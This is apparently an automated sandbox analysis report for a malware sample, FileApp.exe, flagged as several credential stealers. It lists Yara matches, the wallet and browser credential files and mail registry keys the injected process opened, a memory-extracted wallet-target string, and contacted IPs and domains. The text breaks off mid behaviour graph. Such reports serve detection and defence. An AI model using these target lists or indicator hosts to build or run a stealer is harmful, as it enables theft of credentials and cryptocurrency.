Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Found many strings related to Crypto-Wallets (likely being stolen)
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: CVRMAVOZKNKKEPGOIFIDCMVPPNFPDVCIGEJAXXDEIJCFMHXO
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: passphrase.json
Source: RegAsm.exe String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe String found in binary or memory: \Ethereum\
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: RegAsm.exe String found in binary or memory: Ethereum
Source: RegAsm.exe String found in binary or memory: file__0.localstorage
Source: RegAsm.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: RegAsm.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: RegAsm.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Searches for user specific document files
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Directory queried: C:\Users\user\Documents
Yara detected Credential Stealer
Source: Yara match File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2991424929.0000000002818000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 22_2_69CC0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0D60 sqlite3_bind_parameter_name, 22_2_69CC0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0C40 sqlite3_bind_zeroblob, 22_2_69CC0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE8EA0 sqlite3_clear_bindings, 22_2_69BE8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE60B0 listen,WSAGetLastError, 22_2_69BE60B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BEC030 sqlite3_bind_parameter_count, 22_2_69BEC030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE6070 PR_Listen, 22_2_69BE6070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BEC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 22_2_69BEC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE63C0 PR_Bind, 22_2_69BE63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B722D0 sqlite3_bind_blob, 22_2_69B722D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE6410 bind,WSAGetLastError, 22_2_69BE6410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504272 Sample: FileApp.exe Startdate: 04/09/2024 Architecture: WINDOWS Score: 100 119 traineiwnqo.shop 2->119 121 stamppreewntnq.shop 2->121 123 8 other IPs or domains 2->123 171 Suricata IDS alerts for network traffic 2->171 173 Found malware configuration 2->173 175 Malicious sample detected (through community Yara rule) 2->175 177 18 other signatures 2->177 11 FileApp.exe 1 2->11         started        15 ExtreamFanV6.exe 2->15         started        17 jewkkwnf.exe 2->17         started        19 3 other processes 2->19 signatures3 process4 dnsIp5 99 C:\Users\user\AppData\...\FileApp.exe.log, ASCII 11->99 dropped 187 Found many strings related to Crypto-Wallets (likely being stolen) 11->187 189 Writes to foreign memory regions 11->189 191 Allocates memory in foreign processes 11->191 22 RegAsm.exe 35 11->22         started        193 Multi AV Scanner detection for dropped file 15->193 195 Injects a PE file into a foreign processes 15->195 27 ExtreamFanV6.exe 15->27         started        29 ExtreamFanV6.exe 15->29         started        125 127.0.0.1 unknown unknown 19->125 31 WerFault.exe 19->31         started        file6 signatures7 process8 dnsIp9 129 62.133.61.172, 49713, 80 FIRSTDC-ASRU Russian Federation 22->129 131 176.111.174.109, 49721, 80 WILWAWPL Russian Federation 22->131 133 8 other IPs or domains 22->133 89 C:\Users\...\xNc0eiwaHinah8TaPUA3TuXZ.exe, PE32 22->89 dropped 91 C:\Users\...\uht_7KlzJBHoKg010MzYxndX.exe, PE32 22->91 dropped 93 C:\Users\...\pO77aCusXJv6mYqR0srms9ou.exe, PE32 22->93 dropped 95 18 other malicious files 22->95 dropped 179 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->179 181 Drops PE files to the document folder of the user 22->181 183 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 22->183 185 3 other signatures 22->185 33 pO77aCusXJv6mYqR0srms9ou.exe 22->33         started        36 kPy9KuGWnhtidoY4IdmVbiaT.exe 13 22->36         started        39 